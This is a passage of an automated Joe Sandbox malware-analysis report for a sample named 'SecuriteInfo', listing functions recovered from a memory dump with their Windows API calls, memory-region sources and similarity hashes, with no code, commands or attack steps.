                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: lstrcmpilstrcpylstrlen
                    • String ID: cdecl
                    • API String ID: 4031866154-3896280584
                    • Opcode ID: 59c95763c754afb5943372c728cb39e9d215718dbce7dcf4e6b2ed0638010689
                    • Instruction ID: 705ce3db3c5302019a291d345b97f976e94d59160f5e6f70b66827445f923e93
                    • Opcode Fuzzy Hash: 59c95763c754afb5943372c728cb39e9d215718dbce7dcf4e6b2ed0638010689
                    • Instruction Fuzzy Hash: 1F119636200345EFCB25AF64DC49E7A77B8FF86350B40812AF816C7290EB799951D7A4
                    APIs
                    • _free.LIBCMT ref: 00785351
                      • Part of subcall function 0077594C: __FF_MSGBANNER.LIBCMT ref: 00775963
                      • Part of subcall function 0077594C: __NMSG_WRITE.LIBCMT ref: 0077596A
                      • Part of subcall function 0077594C: RtlAllocateHeap.NTDLL(011D0000,00000000,00000001,00000000,?,?,?,00771013,?), ref: 0077598F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: AllocateHeap_free
                    • String ID:
                    • API String ID: 614378929-0
                    • Opcode ID: 926472666984626d7a06664ae4e4ff246389fcb003e8f4f831e3229250ba0347
                    • Instruction ID: 92ce8ca03c12e428b69644e367a60fa52d18e66ea345c30f2cf548f5755ae29d
                    • Opcode Fuzzy Hash: 926472666984626d7a06664ae4e4ff246389fcb003e8f4f831e3229250ba0347
                    • Instruction Fuzzy Hash: D7112332684E05EFCF313F70EC0C65E3B98AF143E8B20852AF9099A491DFBD89409790
                    APIs
                    • _memset.LIBCMT ref: 00754560
                      • Part of subcall function 0075410D: _memset.LIBCMT ref: 0075418D
                      • Part of subcall function 0075410D: _wcscpy.LIBCMT ref: 007541E1
                      • Part of subcall function 0075410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007541F1
                    • KillTimer.USER32(?,00000001,?,?), ref: 007545B5
                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 007545C4
                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0078D6CE
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                    • String ID:
                    • API String ID: 1378193009-0
                    • Opcode ID: ffeb508cf1b732501988f086e6f10bab6023652950fcd882079ec10eeed5d37e
                    • Instruction ID: f4e9c36a649ed4d68c4c08f6c57ac831eda8478508fd8797f4118622032a95f2
                    • Opcode Fuzzy Hash: ffeb508cf1b732501988f086e6f10bab6023652950fcd882079ec10eeed5d37e
                    • Instruction Fuzzy Hash: DF210A705447889FEB329B24DC49BE7BBECAF01319F00409EE69E56181D7B81E88CB51
                    APIs
                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 007B40D1
                    • _memset.LIBCMT ref: 007B40F2
                    • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 007B4144
                    • CloseHandle.KERNEL32(00000000), ref: 007B414D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CloseControlCreateDeviceFileHandle_memset
                    • String ID:
                    • API String ID: 1157408455-0
                    • Opcode ID: fb14be002550a8f8a5d56ce72a00ba572f90e1f784fb9801547e590268e4918a
                    • Instruction ID: f49cfec486091bdee627f7488fe0fbecc47c479e1ed4cf5473dd6b322a738334
                    • Opcode Fuzzy Hash: fb14be002550a8f8a5d56ce72a00ba572f90e1f784fb9801547e590268e4918a
                    • Instruction Fuzzy Hash: C811987590122C7AD7305AA59C4DFEBBB7CEB44760F104196F908D7180D6744E808BA4
                    APIs
                      • Part of subcall function 00755B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,007B7B20,?,?,00000000), ref: 00755B8C
                      • Part of subcall function 00755B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,007B7B20,?,?,00000000,?,?), ref: 00755BB0
                    • gethostbyname.WSOCK32(?,?,?), ref: 007C66AC
                    • WSAGetLastError.WSOCK32(00000000), ref: 007C66B7
                    • _memmove.LIBCMT ref: 007C66E4
                    • inet_ntoa.WSOCK32(?), ref: 007C66EF
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                    • String ID:
                    • API String ID: 1504782959-0
                    • Opcode ID: 7290387a05b7e3a77a836f0a3ec408b2b5805fb116f532d4e1cfed35d18539da
                    • Instruction ID: a2221a05c97807613c7602ea4d253e070ded1c8d95aa56669f2864bbcbb6e211
                    • Opcode Fuzzy Hash: 7290387a05b7e3a77a836f0a3ec408b2b5805fb116f532d4e1cfed35d18539da
                    • Instruction Fuzzy Hash: D9119375900508EFCB00EBA4DD9ADEE77B8BF04311B048129F906A7161DF78AF04DBA1
                    APIs
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 007A9043
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007A9055
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007A906B
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007A9086
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID:
                    • API String ID: 3850602802-0
                    • Opcode ID: b2ec43b8292275d7a6d680c9bb51f910e9258b5c544ca2b1e551a806265ba7e7
                    • Instruction ID: b255b29c42a3f2ff5696638f70787a636332a005dea8ce401b7c47a76626ff85
                    • Opcode Fuzzy Hash: b2ec43b8292275d7a6d680c9bb51f910e9258b5c544ca2b1e551a806265ba7e7
                    • Instruction Fuzzy Hash: 75115E79901219FFDB10DFA5CC84EAEFB74FB48350F204195EA04B7290D671AE10DB94
                    APIs
                      • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                    • DefDlgProcW.USER32(?,00000020,?), ref: 007512D8
                    • GetClientRect.USER32(?,?), ref: 0078B84B
                    • GetCursorPos.USER32(?), ref: 0078B855
                    • ScreenToClient.USER32(?,?), ref: 0078B860
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Client$CursorLongProcRectScreenWindow
                    • String ID:
                    • API String ID: 4127811313-0
                    • Opcode ID: fbf0ea78ba115174375f1edf08bf0d92a0b043aeebcbe76238e613f2cee69d44
                    • Instruction ID: b9e25618fcf86c4740fd974aff9d66b6eafff81fe07251abb4a33595b1a631f6
                    • Opcode Fuzzy Hash: fbf0ea78ba115174375f1edf08bf0d92a0b043aeebcbe76238e613f2cee69d44
                    • Instruction Fuzzy Hash: 49112B35601019FFCB00DF94D889AFE77B8FB05302F404456F942E7151D778AA55CBA5
                    APIs
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,007B01FD,?,007B1250,?,00008000), ref: 007B166F
                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,007B01FD,?,007B1250,?,00008000), ref: 007B1694
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,007B01FD,?,007B1250,?,00008000), ref: 007B169E
                    • Sleep.KERNEL32(?,?,?,?,?,?,?,007B01FD,?,007B1250,?,00008000), ref: 007B16D1
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CounterPerformanceQuerySleep
                    • String ID:
                    • API String ID: 2875609808-0
                    • Opcode ID: 0d3c440c35f1b8aa9b414f2205d77410b70cfb60fee0648ceeccc68110e8281d
                    • Instruction ID: 7dc9bea4128cc5b0ab61599990301dab7ec2c55e6a91e0d6c7104fadf6cb48cb
                    • Opcode Fuzzy Hash: 0d3c440c35f1b8aa9b414f2205d77410b70cfb60fee0648ceeccc68110e8281d
                    • Instruction Fuzzy Hash: 94115A31C0152CEBCF009FA5D858BEEBB78FF09751F848056E941B2240CF3955608B96
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction ID: 9aa422e2f0607389776573d5b88dead8f402113a87a0a07659d03b4a254e7c37
                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction Fuzzy Hash: DE01433608414AFBCF5A6E84CC458EE3F72BF59351B648515FA1998031D33BC9B1EB81
                    APIs
                    • GetWindowRect.USER32(?,?), ref: 007DB59E
                    • ScreenToClient.USER32(?,?), ref: 007DB5B6
                    • ScreenToClient.USER32(?,?), ref: 007DB5DA
                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 007DB5F5
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ClientRectScreen$InvalidateWindow
                    • String ID:
                    • API String ID: 357397906-0
                    • Opcode ID: 10824d24211a97f6c2b77614808fc345265d0b7faf6651d70acc2bdd66947362
                    • Instruction ID: d310bb6b642409b2e54993d1b142aff6d1dc8537dfa5d1333ff0cf95f9bf342e
                    • Opcode Fuzzy Hash: 10824d24211a97f6c2b77614808fc345265d0b7faf6651d70acc2bdd66947362
                    • Instruction Fuzzy Hash: 511166B5D00209EFDB01CF99D4449EEFBB5FB08310F108166E955E3620D735AA618F50
                    APIs
                    • _memset.LIBCMT ref: 007DB8FE
                    • _memset.LIBCMT ref: 007DB90D
                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00817F20,00817F64), ref: 007DB93C
                    • CloseHandle.KERNEL32 ref: 007DB94E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _memset$CloseCreateHandleProcess
                    • String ID:
                    • API String ID: 3277943733-0
                    • Opcode ID: c77a563af195d7fdcb1079f7fa620fb2d91a260dadc99d3f7475d85561ed07cb
                    • Instruction ID: f362c59e6495b2b1db75f86217fa207c27d28053941eb8d2465ca231bebb9a71
                    • Opcode Fuzzy Hash: c77a563af195d7fdcb1079f7fa620fb2d91a260dadc99d3f7475d85561ed07cb
                    • Instruction Fuzzy Hash: 85F05EB2544300BBE6102765AC09FFB3AADFF08794F008025FB09D5292DB79990187A9
                    APIs
                    • EnterCriticalSection.KERNEL32(?), ref: 007B6E88
                      • Part of subcall function 007B794E: _memset.LIBCMT ref: 007B7983
                    • _memmove.LIBCMT ref: 007B6EAB
                    • _memset.LIBCMT ref: 007B6EB8
                    • LeaveCriticalSection.KERNEL32(?), ref: 007B6EC8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CriticalSection_memset$EnterLeave_memmove
                    • String ID:
                    • API String ID: 48991266-0
                    • Opcode ID: 4c1110f9ea4ff7262569a617c75638654f5ed87af0fbf0471c278fbfeade66d3
                    • Instruction ID: 72fe1ae14348ee338f6c09307bf4c1809ff6c012ffa408556d3f52346de034a9
                    • Opcode Fuzzy Hash: 4c1110f9ea4ff7262569a617c75638654f5ed87af0fbf0471c278fbfeade66d3
                    • Instruction Fuzzy Hash: A7F05E3A200200EBCF016F55DC89F8ABB2AFF45360B04C061FE095E22AC739A911DBB5
                    APIs
                      • Part of subcall function 007512F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0075134D
                      • Part of subcall function 007512F3: SelectObject.GDI32(?,00000000), ref: 0075135C
                      • Part of subcall function 007512F3: BeginPath.GDI32(?), ref: 00751373
                      • Part of subcall function 007512F3: SelectObject.GDI32(?,00000000), ref: 0075139C
                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 007DC030
                    • LineTo.GDI32(00000000,?,?), ref: 007DC03D
                    • EndPath.GDI32(00000000), ref: 007DC04D
                    • StrokePath.GDI32(00000000), ref: 007DC05B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                    • String ID:
                    • API String ID: 1539411459-0
                    • Opcode ID: 658ff77657b94eac6e613fe9009b9572dfcb7b5ed41be0fb211a46e1f9f3cbb3
                    • Instruction ID: 7c8a3a972f8f3255e633783811d3b50b3485c065f8b9d6840bc04c4788fdca93
                    • Opcode Fuzzy Hash: 658ff77657b94eac6e613fe9009b9572dfcb7b5ed41be0fb211a46e1f9f3cbb3
                    • Instruction Fuzzy Hash: 96F05E3114225AFBDB136F54AC0AFCE3F69BF05311F18C012FA12621E2C7B95665CB99
                    APIs
                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 007AA399
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 007AA3AC
                    • GetCurrentThreadId.KERNEL32 ref: 007AA3B3
                    • AttachThreadInput.USER32(00000000), ref: 007AA3BA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                    • String ID:
                    • API String ID: 2710830443-0
                    • Opcode ID: a8bc07656948f4a814a5490ef905568b31fcfd47c2f4c424ce44d003cfe2be49
                    • Instruction ID: fbc6b7cf1626eba363c444e1bda8ec10f3ebbe660d365946df2e0d7181839f90
                    • Opcode Fuzzy Hash: a8bc07656948f4a814a5490ef905568b31fcfd47c2f4c424ce44d003cfe2be49
                    • Instruction Fuzzy Hash: 83E0C931546228BADB205FA2DC0DEE77F6CEF167A1F048126F50A95460C77AC540DBA5
                    APIs
                    • GetSysColor.USER32(00000008), ref: 00752231
                    • SetTextColor.GDI32(?,000000FF), ref: 0075223B
                    • SetBkMode.GDI32(?,00000001), ref: 00752250
                    • GetStockObject.GDI32(00000005), ref: 00752258
                    • GetWindowDC.USER32(?,00000000), ref: 0078C0D3
                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0078C0E0
                    • GetPixel.GDI32(00000000,?,00000000), ref: 0078C0F9
                    • GetPixel.GDI32(00000000,00000000,?), ref: 0078C112
                    • GetPixel.GDI32(00000000,?,?), ref: 0078C132
                    • ReleaseDC.USER32(?,00000000), ref: 0078C13D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                    • String ID:
                    • API String ID: 1946975507-0
                    • Opcode ID: 6a289215e7156f1b18ac62af9f3754e43af0585235b2a9625f07f1754f2269dd
                    • Instruction ID: 592ed5365718fc2e65e0901702fcf2050a13c80c7e841c288c9780cd2b08501d
                    • Opcode Fuzzy Hash: 6a289215e7156f1b18ac62af9f3754e43af0585235b2a9625f07f1754f2269dd
                    • Instruction Fuzzy Hash: 3FE06531540248EADB215F64FC0D7D83B20EB05332F04C367FA6A880E187764594DB21
                    APIs
                    • GetCurrentThread.KERNEL32 ref: 007A8C63
                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,007A882E), ref: 007A8C6A
                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,007A882E), ref: 007A8C77
                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,007A882E), ref: 007A8C7E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CurrentOpenProcessThreadToken
                    • String ID:
                    • API String ID: 3974789173-0
                    • Opcode ID: 0532320b2fd92ec9a0bb3672ed73ab8f17fba454792c34f656e0c0ec10d8b32c
                    • Instruction ID: e4c69986a3c7c95877fe52438789d1ca0f5266c372e07945ba9716d33610f31b
                    • Opcode Fuzzy Hash: 0532320b2fd92ec9a0bb3672ed73ab8f17fba454792c34f656e0c0ec10d8b32c
                    • Instruction Fuzzy Hash: 07E04F366432119BD7605FB06E0CB563BB8AF51BA2F09C869E246CA040DA3884418B65
                    APIs
                    • GetDesktopWindow.USER32 ref: 00792187
                    • GetDC.USER32(00000000), ref: 00792191
                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 007921B1
                    • ReleaseDC.USER32(?), ref: 007921D2
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CapsDesktopDeviceReleaseWindow
                    • String ID:
                    • API String ID: 2889604237-0
                    • Opcode ID: 821f079b362de2e0c981e866eb80417a2b19784eeca311226b7105448dce3e1f
                    • Instruction ID: 54a21f0a7d9531e628fad1dcf01c4d0da4ef1071eb70253f05409471b0d44c9e
                    • Opcode Fuzzy Hash: 821f079b362de2e0c981e866eb80417a2b19784eeca311226b7105448dce3e1f
                    • Instruction Fuzzy Hash: 11E0CAB5801208EFDB01AFA0D808AAD7BB1EB4C351F10C42AE95AA7620CB7C82429F45
                    APIs
                    • GetDesktopWindow.USER32 ref: 0079219B
                    • GetDC.USER32(00000000), ref: 007921A5
                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 007921B1
                    • ReleaseDC.USER32(?), ref: 007921D2
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CapsDesktopDeviceReleaseWindow
                    • String ID:
                    • API String ID: 2889604237-0
                    • Opcode ID: cbaf2f29604023c9c95d0d1f567826ed2f6508e04335e1e4227ebf3460275e8c
                    • Instruction ID: 8b29249524a1df68e058ca2cf7166af5b05e9f95cea6172fd591891a26551f88
                    • Opcode Fuzzy Hash: cbaf2f29604023c9c95d0d1f567826ed2f6508e04335e1e4227ebf3460275e8c
                    • Instruction Fuzzy Hash: CBE0EEB5801204EFCB01AFA0CC0869D7BF1EB4C311F10C42AF95AA7620CB7C92419F44
